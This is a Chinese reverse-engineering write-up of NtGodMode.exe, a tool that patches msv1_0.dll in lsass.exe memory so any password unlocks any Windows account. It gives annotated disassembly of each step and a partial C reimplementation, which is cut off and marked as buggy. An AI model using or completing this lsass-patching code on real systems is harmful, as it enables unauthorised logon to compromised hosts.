废话
家里蹲得有点郁闷,网上逛来逛去...在安全焦点看到了golds7n[LAG]写的NtGodMode.exe。
好奇了一番,菜菜的逆了它。
软件介绍:NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、
不破坏被入侵主机系统的情况下,登录系统帐号。
一、逆向分析
ESP法快速脱掉UPX后,发现是Delphi写的。
=====================
关键一
查找特征码偏移
=====================
UPX0:004032C1 loc_4032C1: ; CODE XREF: UPX0:0040325Ej
UPX0:004032C1 mov eax, off_40408C ; off_40408C dd offset aMsv1_0_dll
UPX0:004032C6 call sub_401D2C ; 判断变量是否为空
UPX0:004032CB push eax ; Msv1_0_dll
UPX0:004032CC call LoadLibraryA ; 加载Msv1_0.dll
UPX0:004032D1 mov dword_40574C, eax
UPX0:004032D6 cmp dword_40574C, 0
UPX0:004032DD jz loc_403865
UPX0:004032E3 xor eax, eax
UPX0:004032E5 mov dword_405750, eax
UPX0:004032EA mov eax, dword_40574C
UPX0:004032EF mov [ebx], eax
UPX0:004032F1 xor eax, eax
UPX0:004032F3 push ebp
UPX0:004032F4 push offset loc_403350
UPX0:004032F9 push dword ptr fs:[eax]
UPX0:004032FC mov fs:[eax], esp ; 上面特征码查找准备,不用管它。
UPX0:004032FF
UPX0:004032FF loc_4032FF: ; CODE XREF: UPX0:00403324j
UPX0:004032FF mov eax, [ebx]
UPX0:00403301 cmp byte ptr [eax], 8Bh ;
UPX0:00403304 jnz short loc_403322
UPX0:00403306 mov eax, [ebx]
UPX0:00403308 inc eax
UPX0:00403309 cmp byte ptr [eax], 4Dh ;
UPX0:0040330C jnz short loc_403322
UPX0:0040330E mov eax, [ebx]
UPX0:00403310 add eax, 2
UPX0:00403313 cmp byte ptr [eax], 0Ch ;
UPX0:00403316 jnz short loc_403322
UPX0:00403318 mov eax, [ebx]
UPX0:0040331A add eax, 3
UPX0:0040331D cmp byte ptr [eax], 49h ;
UPX0:00403320 jz short loc_403326 ; 查找找8B 4D 0C 49 这组特征值,ok的话继续查找32 C0
UPX0:00403322
UPX0:00403322 loc_403322: ; CODE XREF: UPX0:00403304j
UPX0:00403322 ; UPX0:0040330Cj ...
UPX0:00403322 inc dword ptr [ebx]
UPX0:00403324 jmp short loc_4032FF
UPX0:00403326 ; ---------------------------------------------------------------------------
UPX0:00403326
UPX0:00403326 loc_403326: ; CODE XREF: UPX0:00403320j
UPX0:00403326 ; UPX0:00403340j
UPX0:00403326 mov eax, [ebx]
UPX0:00403328 cmp byte ptr [eax], 32h
UPX0:0040332B jnz short loc_40333E
UPX0:0040332D mov eax, [ebx]
UPX0:0040332F inc eax
UPX0:00403330 cmp byte ptr [eax], 0C0h
UPX0:00403333 jnz short loc_40333E
UPX0:00403335 mov eax, [ebx]
UPX0:00403337 mov dword_405750, eax
UPX0:0040333C jmp short loc_403342
UPX0:0040333E ; ---------------------------------------------------------------------------
UPX0:0040333E
UPX0:0040333E loc_40333E: ; CODE XREF: UPX0:0040332Bj
UPX0:0040333E ; UPX0:00403333j
UPX0:0040333E inc dword ptr [ebx]
UPX0:00403340 jmp short loc_403326
UPX0:00403342 ; ---------------------------------------------------------------------------
UPX0:00403342
UPX0:00403342 loc_403342: ; CODE XREF: UPX0:0040333Cj
UPX0:00403342 xor eax, eax
UPX0:00403344 pop edx
UPX0:00403345 pop ecx
UPX0:00403346 pop ecx
UPX0:00403347 mov fs:[eax], edx
UPX0:0040334A push offset loc_403357
UPX0:0040334F
UPX0:0040334F loc_40334F: ; CODE XREF: UPX0:00403355j
UPX0:0040334F retn ; 返回00403357
UPX0:00403357 loc_403357: ; CODE XREF: UPX0:loc_40334Fj
UPX0:00403357 ; DATA XREF: UPX0:0040334Ao
UPX0:00403357 mov eax, dword_405750
UPX0:0040335C sub eax, dword_40574C
UPX0:00403362 mov dword_405750, eax
UPX0:00403367 mov eax, dword_40574C ; 保存好特征码偏移
UPX0:0040336C push eax
UPX0:0040336D call FreeLibrary_0 ; 释放dll
UPX0:00403372 mov byte_40589C, 0
UPX0:00403379 mov onoroff, 0
UPX0:00403380 mov byte_40589D, 0
UPX0:00403387 call sub_4030B4
UPX0:0040338C lea edx, [ebp-24h]
UPX0:0040338F mov eax, 2
UPX0:00403394 call sub_40236C
UPX0:00403399 mov eax, [ebp-24h]
UPX0:0040339C lea edx, [ebp-20h]
UPX0:0040339F call sub_402634
UPX0:004033A4 mov eax, [ebp-20h]
UPX0:004033A7 mov edx, offset aDebug ; "DEBUG"
UPX0:004033AC call sub_401C88
UPX0:004033B1 jnz short loc_4033BA ; 是否为调试模式
UPX0:004033B3 mov byte_40589C, 1 ; 是的话把调试模式设置为1
UPX0:004033BA
UPX0:004033BA loc_4033BA: ; CODE XREF: UPX0:004033B1j
UPX0:004033BA cmp byte_40589C, 0
UPX0:004033C1 jz short loc_4033FC ; 判断调试模式
UPX0:004033C3 lea ecx, [ebp-2Ch] ; 是的话显示特征码偏移信息
UPX0:004033C6 mov edx, 8
UPX0:004033CB mov eax, dword_405750
UPX0:004033D0 call sub_4025A0
UPX0:004033D5 mov ecx, [ebp-2Ch]
UPX0:004033D8 lea eax, [ebp-28h]
UPX0:004033DB mov edx, offset aFoundOffset0x ; "Found Offset: 0x"
UPX0:004033E0 call sub_401B90
UPX0:004033E5 mov edx, [ebp-28h]
UPX0:004033E8 mov eax, off_404098
UPX0:004033ED call sub_401E24
UPX0:004033F2 call sub_401720
UPX0:004033F7 call sub_4011F4
UPX0:004033FC
UPX0:004033FC loc_4033FC: ; CODE XREF: UPX0:004033C1j
UPX0:004033FC lea edx, [ebp-34h] ; 来到这里,接下来是参数 on | off 判断
UPX0:004033FF mov eax, 1
UPX0:00403404 call sub_40236C
UPX0:00403409 mov eax, [ebp-34h]
UPX0:0040340C lea edx, [ebp-30h]
UPX0:0040340F call sub_402634
UPX0:00403414 mov eax, [ebp-30h]
UPX0:00403417 mov edx, offset aOn ; "ON"
UPX0:0040341C call sub_401C88
UPX0:00403421 jnz short loc_40342F
UPX0:00403423 mov onoroff, 1 ; ON 的话onoroff为1
UPX0:0040342A jmp loc_4034BB ; Go
UPX0:0040342F ; ---------------------------------------------------------------------------
UPX0:0040342F
UPX0:0040342F loc_40342F: ; CODE XREF: UPX0:00403421j
UPX0:0040342F lea edx, [ebp-3Ch]
UPX0:00403432 mov eax, 1
UPX0:00403437 call sub_40236C
UPX0:0040343C mov eax, [ebp-3Ch]
UPX0:0040343F lea edx, [ebp-38h]
UPX0:00403442 call sub_402634
UPX0:00403447 mov eax, [ebp-38h]
UPX0:0040344A mov edx, offset aOff ; "OFF"
UPX0:0040344F call sub_401C88
UPX0:00403454 jnz short loc_40345F
UPX0:00403456 mov onoroff, 0 ; off 则反之
UPX0:0040345D jmp short loc_4034BB ; 提权函数,嘿嘿
UPX0:0040345F ; ---------------------------------------------------------------------------
UPX0:0040345F
UPX0:0040345F loc_40345F: ; CODE XREF: UPX0:00403454j
UPX0:0040345F push offset aUsage ; "Usage: "
UPX0:00403464 lea edx, [ebp-48h]
UPX0:00403467 xor eax, eax
UPX0:00403469 call sub_40236C
UPX0:0040346E mov eax, [ebp-48h]
UPX0:00403471 lea edx, [ebp-44h]
UPX0:00403474 call sub_402690
UPX0:00403479 push dword ptr [ebp-44h]
UPX0:0040347C push offset aOnOff ; " ON|OFF"
UPX0:00403481 lea eax, [ebp-40h]
UPX0:00403484 mov edx, 3
UPX0:00403489 call sub_401C04
UPX0:0040348E mov edx, [ebp-40h]
UPX0:00403491 mov eax, off_404098
UPX0:00403496 call sub_401E24
UPX0:0040349B call sub_401720
UPX0:004034A0 call sub_4011F4
UPX0:004034A5 mov eax, off_404098
UPX0:004034AA call sub_401720
UPX0:004034AF call sub_4011F4
UPX0:004034B4 push 0
UPX0:004034B6 call ExitProcess_0
========================
关键二
提权函数
========================
UPX0:004034BB call sub_402F1C ; 提权函数,嘿嘿
UPX0:004034C0 test al, al ; 成功否?
UPX0:004034C2 jz loc_403865 ; 0 则 挂
-----------------------------------------------------------------------------------------------
UPX0:00402F1C
UPX0:00402F1C sub_402F1C proc near ; CODE XREF: UPX0:loc_4034BBp
UPX0:00402F1C ; Enables SeDebugPrivilege on the calling process's own token.
UPX0:00402F1C ; Out: al = 1 when AdjustTokenPrivileges returned non-zero, else 0.
UPX0:00402F1C ; Note: the OpenProcessToken result is not checked, a non-zero
UPX0:00402F1C ; AdjustTokenPrivileges result does not prove the privilege was
UPX0:00402F1C ; actually enabled, and the token handle is never closed.
UPX0:00402F1C
UPX0:00402F1C TokenHandle = dword ptr -1Ch
UPX0:00402F1C ReturnLength = dword ptr -18h
UPX0:00402F1C NewState = _TOKEN_PRIVILEGES ptr -14h
UPX0:00402F1C
UPX0:00402F1C push ebx
UPX0:00402F1D add esp, 0FFFFFFE8h ; esp -= 18h: room for TokenHandle, ReturnLength, NewState
UPX0:00402F20 xor ebx, ebx ; ebx = result, 0 until the adjust call succeeds
UPX0:00402F22 push esp ; TokenHandle (esp now points at the -1Ch slot)
UPX0:00402F23 push 28h ; DesiredAccess = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
UPX0:00402F25 call GetCurrentProcess
UPX0:00402F2A push eax ; ProcessHandle
UPX0:00402F2B call OpenProcessToken ; return value ignored
UPX0:00402F30 lea eax, [esp+1Ch+NewState.Privileges] ; &NewState.Privileges[0].Luid
UPX0:00402F34 push eax ; lpLuid
UPX0:00402F35 push offset Name ; "SeDebugPrivilege"
UPX0:00402F3A push 0 ; lpSystemName
UPX0:00402F3C call LookupPrivilegeValueA
UPX0:00402F41 test eax, eax
UPX0:00402F43 jz short loc_402F75 ; lookup failed: return 0 (ebx still 0)
UPX0:00402F45 mov [esp+1Ch+NewState.PrivilegeCount], 1
UPX0:00402F4D mov [esp+1Ch+NewState.Privileges.Attributes], 2 ; 2 = SE_PRIVILEGE_ENABLED
UPX0:00402F55 lea eax, [esp+1Ch+ReturnLength]
UPX0:00402F59 push eax ; ReturnLength
UPX0:00402F5A push 0 ; PreviousState
UPX0:00402F5C push 10h ; BufferLength = sizeof(TOKEN_PRIVILEGES) with one entry
UPX0:00402F5E lea eax, [esp+28h+NewState]
UPX0:00402F62 push eax ; NewState
UPX0:00402F63 push 0 ; DisableAllPrivileges
UPX0:00402F65 mov eax, [esp+30h+TokenHandle]
UPX0:00402F69 push eax ; TokenHandle
UPX0:00402F6A call AdjustTokenPrivileges
UPX0:00402F6F cmp eax, 1 ; CF set only when eax == 0
UPX0:00402F72 sbb ebx, ebx ; ebx = -1 if eax == 0, else 0
UPX0:00402F74 inc ebx ; ebx = (eax != 0)
UPX0:00402F75
UPX0:00402F75 loc_402F75: ; CODE XREF: sub_402F1C+27j
UPX0:00402F75 mov eax, ebx ; al = result flag
UPX0:00402F77 add esp, 18h ; release locals
UPX0:00402F7A pop ebx
UPX0:00402F7B retn
UPX0:00402F7B sub_402F1C endp
F5 之,嘿嘿
// Hex-Rays pseudocode for sub_402F1C: enable SeDebugPrivilege on the
// process's own token. Returns true when AdjustTokenPrivileges returned
// non-zero; the OpenProcessToken result is never checked and the token
// handle is never closed.
bool __cdecl sub_402F1C()
{
    bool v0; // ebx@1
    HANDLE v2; // eax@1
    HANDLE TokenHandle; // [sp+0h] [bp-1Ch]@1
    struct _TOKEN_PRIVILEGES NewState; // [sp+8h] [bp-14h]@1
    DWORD ReturnLength; // [sp+4h] [bp-18h]@2
    v0 = 0;
    v2 = GetCurrentProcess();
    OpenProcessToken(v2, 0x28u, &TokenHandle); // 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY; result unchecked
    if ( LookupPrivilegeValueA(0, "SeDebugPrivilege", (struct _LUID *)NewState.Privileges) )
    {
        NewState.PrivilegeCount = 1;
        NewState.Privileges[0].Attributes = 2; // SE_PRIVILEGE_ENABLED
        // A non-zero return only says the call itself succeeded, not that
        // the privilege is now enabled on the token.
        v0 = (unsigned int)AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, 0, &ReturnLength) >= 1;
    }
    return v0;
}
------------------------------------------------------------------------------------------------
========================
关键三
获取特征码在内存中的基址
========================
打开lsass.exe进程
00403572 8B45 B4 mov eax, dword ptr [ebp-4C]
00403575 BA FC384000 mov edx, 004038FC ; ASCII "LSASS.EXE"
0040357A E8 09E7FFFF call 00401C88
0040357F 0F85 AE020000 jnz 00403833
00403585 A1 54574000 mov eax, dword ptr [405754]
0040358A 50 push eax
0040358B 6A 00 push 0
0040358D 68 FF0F1F00 push 1F0FFF
00403592 E8 01ECFFFF call <jmp.&KERNEL32.OpenProcess> ; 打开lsass.exe进程
00403597 8BF0 mov esi, eax
00403599 85F6 test esi, esi
0040359B 75 1E jnz short 004035BB
0040359D A1 98404000 mov eax, dword ptr [404098]
004035A2 BA 10394000 mov edx, 00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF call 00401E24
004035AC E8 6FE1FFFF call 00401720
004035B1 E8 3EDCFFFF call 004011F4
NtGod通过Psapi.dll提供的API函数EnumProcesses和EnumProcessModules来实现进程与模块的枚举。
------------------------------------------------------------------------------------------------
UPX0:00402B18 sub_402B18 proc near ; CODE XREF: sub_402E84+Cp
UPX0:00402B18 ; sub_402EB4+Cp
UPX0:00402B18 ; Lazy loader for PSAPI.dll: on the first call it loads the DLL and
UPX0:00402B18 ; resolves its exports into a global pointer table
UPX0:00402B18 ; (dword_4056F0 .. dword_405748); later calls return al = 1 at once.
UPX0:00402B18 ; Out: al = 1 on success, eax = 0 when the DLL could not be loaded.
UPX0:00402B18 ; Note: every GetProcAddress result is stored without a NULL check,
UPX0:00402B18 ; so a missing export leaves a NULL function pointer in the table.
UPX0:00402B18 push ebx
UPX0:00402B19 mov ebx, offset dword_4056EC ; ebx -> cached module handle
UPX0:00402B1E cmp dword ptr [ebx], 0
UPX0:00402B21 jnz loc_402CDE ; already loaded: skip to success
UPX0:00402B27 push offset LibFileName ; "PSAPI.dll"
UPX0:00402B2C call LoadLibraryA
UPX0:00402B31 mov [ebx], eax
UPX0:00402B33 cmp dword ptr [ebx], 20h ; handles below 20h (including NULL) count as failure,
UPX0:00402B36 jnb short loc_402B40 ; presumably the legacy HINSTANCE_ERROR convention
UPX0:00402B38 xor eax, eax
UPX0:00402B3A mov [ebx], eax ; clear the cache so the next call retries
UPX0:00402B3C xor eax, eax
UPX0:00402B3E pop ebx
UPX0:00402B3F retn ; eax = 0: failure
UPX0:00402B40 ; ---------------------------------------------------------------------------
UPX0:00402B40
UPX0:00402B40 loc_402B40: ; CODE XREF: sub_402B18+1Ej
UPX0:00402B40 ; Resolve each export into its table slot; results are not checked.
UPX0:00402B40 push offset aEnumprocesses ; "EnumProcesses"
UPX0:00402B45 mov eax, [ebx]
UPX0:00402B47 push eax ; hModule
UPX0:00402B48 call GetProcAddress
UPX0:00402B4D mov dword_4056F0, eax
UPX0:00402B52 push offset aEnumprocessmod ; "EnumProcessModules"
UPX0:00402B57 mov eax, [ebx]
UPX0:00402B59 push eax ; hModule
UPX0:00402B5A call GetProcAddress
UPX0:00402B5F mov dword_4056F4, eax
UPX0:00402B64 push offset aGetmodulebasen ; "GetModuleBaseNameA"
UPX0:00402B69 mov eax, [ebx]
UPX0:00402B6B push eax ; hModule
UPX0:00402B6C call GetProcAddress
UPX0:00402B71 mov dword_4056F8, eax
UPX0:00402B76 push offset aGetmodulefilen ; "GetModuleFileNameExA"
UPX0:00402B7B mov eax, [ebx]
UPX0:00402B7D push eax ; hModule
UPX0:00402B7E call GetProcAddress
UPX0:00402B83 mov dword_4056FC, eax
UPX0:00402B88 push offset aGetmodulebasen ; "GetModuleBaseNameA" (same export again, second slot)
UPX0:00402B8D mov eax, [ebx]
UPX0:00402B8F push eax ; hModule
UPX0:00402B90 call GetProcAddress
UPX0:00402B95 mov dword_405700, eax
UPX0:00402B9A push offset aGetmodulefilen ; "GetModuleFileNameExA" (same export again, second slot)
UPX0:00402B9F mov eax, [ebx]
UPX0:00402BA1 push eax ; hModule
UPX0:00402BA2 call GetProcAddress
UPX0:00402BA7 mov dword_405704, eax
UPX0:00402BAC push offset aGetmodulebas_0 ; "GetModuleBaseNameW"
UPX0:00402BB1 mov eax, [ebx]
UPX0:00402BB3 push eax ; hModule
UPX0:00402BB4 call GetProcAddress
UPX0:00402BB9 mov dword_405708, eax
UPX0:00402BBE push offset aGetmodulefil_0 ; "GetModuleFileNameExW"
UPX0:00402BC3 mov eax, [ebx]
UPX0:00402BC5 push eax ; hModule
UPX0:00402BC6 call GetProcAddress
UPX0:00402BCB mov dword_40570C, eax
UPX0:00402BD0 push offset aGetmoduleinfor ; "GetModuleInformation"
UPX0:00402BD5 mov eax, [ebx]
UPX0:00402BD7 push eax ; hModule
UPX0:00402BD8 call GetProcAddress
UPX0:00402BDD mov dword_405710, eax
UPX0:00402BE2 push offset aEmptyworkingse ; "EmptyWorkingSet"
UPX0:00402BE7 mov eax, [ebx]
UPX0:00402BE9 push eax ; hModule
UPX0:00402BEA call GetProcAddress
UPX0:00402BEF mov dword_405714, eax
UPX0:00402BF4 push offset aQueryworkingse ; "QueryWorkingSet"
UPX0:00402BF9 mov eax, [ebx]
UPX0:00402BFB push eax ; hModule
UPX0:00402BFC call GetProcAddress
UPX0:00402C01 mov dword_405718, eax
UPX0:00402C06 push offset aInitializeproc ; "InitializeProcessForWsWatch"
UPX0:00402C0B mov eax, [ebx]
UPX0:00402C0D push eax ; hModule
UPX0:00402C0E call GetProcAddress
UPX0:00402C13 mov dword_40571C, eax
UPX0:00402C18 push offset aGetmappedfilen ; "GetMappedFileNameA"
UPX0:00402C1D mov eax, [ebx]
UPX0:00402C1F push eax ; hModule
UPX0:00402C20 call GetProcAddress
UPX0:00402C25 mov dword_405720, eax
UPX0:00402C2A push offset aGetdevicedrive ; "GetDeviceDriverBaseNameA"
UPX0:00402C2F mov eax, [ebx]
UPX0:00402C31 push eax ; hModule
UPX0:00402C32 call GetProcAddress
UPX0:00402C37 mov dword_405724, eax
UPX0:00402C3C push offset aGetdevicedri_0 ; "GetDeviceDriverFileNameA"
UPX0:00402C41 mov eax, [ebx]
UPX0:00402C43 push eax ; hModule
UPX0:00402C44 call GetProcAddress
UPX0:00402C49 mov dword_405728, eax
UPX0:00402C4E push offset aGetmappedfilen ; "GetMappedFileNameA" (same export again, second slot)
UPX0:00402C53 mov eax, [ebx]
UPX0:00402C55 push eax ; hModule
UPX0:00402C56 call GetProcAddress
UPX0:00402C5B mov dword_40572C, eax
UPX0:00402C60 push offset aGetdevicedrive ; "GetDeviceDriverBaseNameA" (same export again, second slot)
UPX0:00402C65 mov eax, [ebx]
UPX0:00402C67 push eax ; hModule
UPX0:00402C68 call GetProcAddress
UPX0:00402C6D mov dword_405730, eax
UPX0:00402C72 push offset aGetdevicedri_0 ; "GetDeviceDriverFileNameA" (same export again, second slot)
UPX0:00402C77 mov eax, [ebx]
UPX0:00402C79 push eax ; hModule
UPX0:00402C7A call GetProcAddress
UPX0:00402C7F mov dword_405734, eax
UPX0:00402C84 push offset aGetmappedfil_0 ; "GetMappedFileNameW"
UPX0:00402C89 mov eax, [ebx]
UPX0:00402C8B push eax ; hModule
UPX0:00402C8C call GetProcAddress
UPX0:00402C91 mov dword_405738, eax
UPX0:00402C96 push offset aGetdevicedri_1 ; "GetDeviceDriverBaseNameW"
UPX0:00402C9B mov eax, [ebx]
UPX0:00402C9D push eax ; hModule
UPX0:00402C9E call GetProcAddress
UPX0:00402CA3 mov dword_40573C, eax
UPX0:00402CA8 push offset aGetdevicedri_2 ; "GetDeviceDriverFileNameW"
UPX0:00402CAD mov eax, [ebx]
UPX0:00402CAF push eax ; hModule
UPX0:00402CB0 call GetProcAddress
UPX0:00402CB5 mov dword_405740, eax
UPX0:00402CBA push offset aEnumdevicedriv ; "EnumDeviceDrivers"
UPX0:00402CBF mov eax, [ebx]
UPX0:00402CC1 push eax ; hModule
UPX0:00402CC2 call GetProcAddress
UPX0:00402CC7 mov dword_405744, eax
UPX0:00402CCC push offset aGetprocessmemo ; "GetProcessMemoryInfo"
UPX0:00402CD1 mov eax, [ebx]
UPX0:00402CD3 push eax ; hModule
UPX0:00402CD4 call GetProcAddress
UPX0:00402CD9 mov dword_405748, eax
UPX0:00402CDE
UPX0:00402CDE loc_402CDE: ; CODE XREF: sub_402B18+9j
UPX0:00402CDE mov al, 1 ; success
UPX0:00402CE0 pop ebx
UPX0:00402CE1 retn
UPX0:00402CE1 sub_402B18 endp
-------------------------------------------------------------------------------------------------------------
枚举进程的代码就不贴了,下面是枚举模块并获取msv1_0.dll基址的代码
004035FF 833B 00 cmp dword ptr [ebx], 0
00403602 0F84 BD000000 je 004036C5
00403608 C705 A4584100 C>mov dword ptr [4158A4], 0C8
00403612 A1 A4584100 mov eax, dword ptr [4158A4]
00403617 50 push eax
00403618 B9 A8584100 mov ecx, 004158A8 ; ASCII "C:\WINDOWS\system32\msv1_0.dll"
0040361D 8B13 mov edx, dword ptr [ebx]
0040361F 8BC6 mov eax, esi
00403621 E8 8EF8FFFF call 00402EB4 ; PSAPI.EnumProcessModules
00403626 B8 94584000 mov eax, 00405894
0040362B BA A8584100 mov edx, 004158A8 ; ASCII "C:\WINDOWS\system32\msv1_0.dll"
00403630 B9 C9000000 mov ecx, 0C9
00403635 E8 F2E4FFFF call 00401B2C
0040363A 8D55 A8 lea edx, dword ptr [ebp-58]
0040363D A1 94584000 mov eax, dword ptr [405894]
00403642 E8 49F0FFFF call 00402690
00403647 8B45 A8 mov eax, dword ptr [ebp-58] ; (ASCII "msv1_0.dll")
0040364A 8D55 AC lea edx, dword ptr [ebp-54]
0040364D E8 BAEFFFFF call 0040260C
00403652 8B45 AC mov eax, dword ptr [ebp-54] ; 堆栈 ss:[0012FF6C]=00156A28, (ASCII "msv1_0.dll")
00403655 8B15 8C404000 mov edx, dword ptr [40408C] ; ds:[0040408C]=00403180 (NtGod.00403180), ASCII "msv1_0.dll"
0040365B E8 28E6FFFF call 00401C88
00403660 75 53 jnz short 004036B5
00403662 8B03 mov eax, dword ptr [ebx]
00403664 0105 50574000 add dword ptr [405750], eax
0040366A C605 9D584000 0>mov byte ptr [40589D], 1
00403671 803D 9C584000 0>cmp byte ptr [40589C], 0
00403678 74 4B je short 004036C5
0040367A 8D4D A0 lea ecx, dword ptr [ebp-60]
0040367D BA 08000000 mov edx, 8
00403682 A1 50574000 mov eax, dword ptr [405750]
00403687 E8 14EFFFFF call 004025A0
0040368C 8B4D A0 mov ecx, dword ptr [ebp-60]
0040368F 8D45 A4 lea eax, dword ptr [ebp-5C]
00403692 BA 30394000 mov edx, 00403930 ; ASCII "Found Running Target: "
00403697 E8 F4E4FFFF call 00401B90
0040369C 8B55 A4 mov edx, dword ptr [ebp-5C]
0040369F A1 98404000 mov eax, dword ptr [404098]
004036A4 E8 7BE7FFFF call 00401E24
004036A9 E8 72E0FFFF call 00401720
004036AE E8 41DBFFFF call 004011F4
004036B3 EB 10 jmp short 004036C5
004036B5 FF05 58574000 inc dword ptr [405758]
004036BB 83C3 04 add ebx, 4
004036BE 4F dec edi
004036BF ^ 0F85 3AFFFFFF jnz 004035FF
004036C5 803D 9D584000 0>cmp byte ptr [40589D], 0
004036CC 75 5B jnz short 00403729
004036CE 56 push esi
004036CF E8 5CEAFFFF call <jmp.&KERNEL32.CloseHandle>
004036D4 803D 9C584000 0>cmp byte ptr [40589C], 0
004036DB 74 19 je short 004036F6
========================
关键四
进程读写
VirtualProtectEx、
WriteProcessMemory 函数
========================
00403732 68 5C574000 push 0040575C
00403737 6A 40 push 40
00403739 6A 02 push 2
0040373B A1 50574000 mov eax, dword ptr [405750]
00403740 50 push eax
00403741 56 push esi
00403742 E8 79EAFFFF call <jmp.&KERNEL32.VirtualProtectEx>
00403747 68 98584000 push 00405898
0040374C 6A 02 push 2
0040374E 68 90404000 push 00404090
00403753 A1 50574000 mov eax, dword ptr [405750]
00403758 50 push eax
00403759 56 push esi
0040375A E8 69EAFFFF call <jmp.&KERNEL32.WriteProcessMemory>
0040375F B0 04 mov al, 4
00403761 E8 DEEFFFFF call 00402744
00403766 A1 98404000 mov eax, dword ptr [404098]
0040376B BA 70394000 mov edx, 00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF call 00401E24
00403775 E8 A6DFFFFF call 00401720
0040377A E8 75DAFFFF call 004011F4
0040377F 33C0 xor eax, eax
00403781 E8 BEEFFFFF call 00402744
00403786 EB 54 jmp short 004037DC
二、逆向小结
1、获取特征码在msv1_0.dll中的偏移位置
2、进程提权为进入lsass.exe作准备
3、枚举进程获取 lsass.exe 进程句柄
4、枚举lsass.exe模块获取msv1_0.dll在内存中的基地址
5、基地址+偏移 = 特征码的虚拟地址
6、读写内存
三、相同效果的代码
/*
Name: RNtGod
Author: Cyg07
Other: Reverse from golds7n[LAG]'s NtGod
*/
#include "stdafx.h"
#include "windows.h"
#include "tlhelp32.h"
// 提权函数
BOOL EnableDebugPriv(void)
{
    // Enables SeDebugPrivilege on the current process token. The privilege
    // must already be present on the token (an administrative caller);
    // the function only toggles it on.
    // Returns the AdjustTokenPrivileges result, or FALSE if the token could
    // not be opened or the privilege LUID could not be looked up.
    HANDLE hToken; // NOTE(review): uninitialized, yet closed below even when OpenProcessToken fails
    HANDLE hProcess = GetCurrentProcess();
    BOOL bREt = FALSE;
    if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
    {
        TOKEN_PRIVILEGES tkp;
        if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
        {
            tkp.PrivilegeCount = 1;
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            // A non-zero return only means the call succeeded; whether the
            // privilege was really enabled is reported through GetLastError
            // (ERROR_NOT_ALL_ASSIGNED), which is not checked here.
            bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
        }
    }
    CloseHandle(hToken);
    return bREt;
}
// 获取目标进程Pid
DWORD GetTargetPid(char *pn)
{
    // Walks a Toolhelp process snapshot and returns the PID of the first
    // process whose image name matches pn case-insensitively; 0 if none.
    // NOTE(review): the snapshot handle is never closed (leaks on every
    // call), and the CreateToolhelp32Snapshot result is not checked for
    // INVALID_HANDLE_VALUE before use.
    BOOL b;
    HANDLE hnd;
    PROCESSENTRY32 pe;
    hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pe.dwSize = sizeof(pe); // required before Process32First
    b=Process32First(hnd, &pe);
    while(b)
    {
        if (lstrcmpi(pn, pe.szExeFile) == 0)
            return pe.th32ProcessID; // early return: hnd stays open
        b=Process32Next(hnd,&pe);
    }
    return 0;
}
// 获取特征码偏移
DWORD GetSinatureAddr(char *dn)
{
    // Loads dn into this process and scans its image for the byte pattern
    // 8B 4D 0C 49 followed (somewhere later) by 32 C0; returns the offset
    // of the 32 C0 match from the module base, or -1 (as DWORD) if the
    // DLL could not be loaded.
    // NOTE(review): the scan has no upper bound. If the pattern is absent
    // the loop walks past the end of the mapping and faults.
    HMODULE hLib;
    DWORD dwSinatureAddr; // set inside the asm block at the 32 C0 match
    hLib = LoadLibrary(dn);
    if ( hLib )
    {
        // Pattern check. NOTE(review): ebx is pushed but never pointed at
        // a variable before it is written through, and eax is used as the
        // initial scan pointer without being set here; in the disassembly
        // this was ported from, ebx pointed at a scan-pointer variable that
        // was first filled with the LoadLibraryA result. This block relies
        // on whatever the compiler left in those registers.
        __asm
        {
            push ebx
            mov dword ptr [ebx], eax            // *ebx = scan pointer (see note above)
            xor eax, eax
        check_1_start:
            mov eax, dword ptr [ebx]
            cmp byte ptr [eax], 0x8B
            jnz short check_1_end
            mov eax, dword ptr [ebx]
            inc eax
            cmp byte ptr [eax], 0x4D
            jnz short check_1_end
            mov eax, dword ptr [ebx]
            add eax, 2
            cmp byte ptr [eax], 0x0C
            jnz short check_1_end
            mov eax, dword ptr [ebx]
            add eax, 3
            cmp byte ptr [eax], 0x49
            je short check_2_start              // 8B 4D 0C 49 matched: look for 32 C0
        check_1_end:
            inc dword ptr [ebx]                 // advance one byte, no bound check
            jmp short check_1_start
        check_2_start:
            mov eax, dword ptr [ebx]
            cmp byte ptr [eax], 0x32
            jnz short check_2_end
            mov eax, dword ptr [ebx]
            inc eax
            cmp byte ptr [eax], 0x0c0
            jnz short check_2_end
            mov eax, dword ptr [ebx]
            push eax
            lea eax, dwSinatureAddr
            pop dword ptr [eax]                 // dwSinatureAddr = address of the 32 C0 match
            mov eax, dword ptr [ebx]
            jmp short check__over
        check_2_end:
            inc dword ptr [ebx]
            jmp short check_2_start
        check__over:
            xor eax, eax
            pop ebx
        }
    }
    else
    {
        // NOTE(review): this branch is reached when LoadLibrary fails, but
        // the message talks about the pattern; -1 is returned as a DWORD
        // and the caller in main() does not check it.
        printf("Failt to found the Sinature offset.\n");
        return -1;
    }
    dwSinatureAddr = dwSinatureAddr - (DWORD)hLib; // absolute address -> offset from module base
    //printf("%08x , %x\n", dwSinatureAddr, hLib);
    FreeLibrary(hLib);
    return dwSinatureAddr;
}
// 获取msv1_0.dll在内存中的基址
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
    // Returns the load address of module dn inside process dwTargetPid,
    // taken from a Toolhelp module snapshot; 0 if Module32First fails.
    // NOTE(review): the Module32Next return value is discarded and bModule
    // is never updated, so when dn is not in the snapshot the loop never
    // terminates (it keeps re-reading the last entry).
    DWORD dwModBase = NULL; // NULL used as integer zero
    HANDLE hModuleSnap;
    MODULEENTRY32 lpModInfo = {0};
    BOOL bModule = NULL;
    lpModInfo.dwSize = sizeof(lpModInfo); // required before Module32First
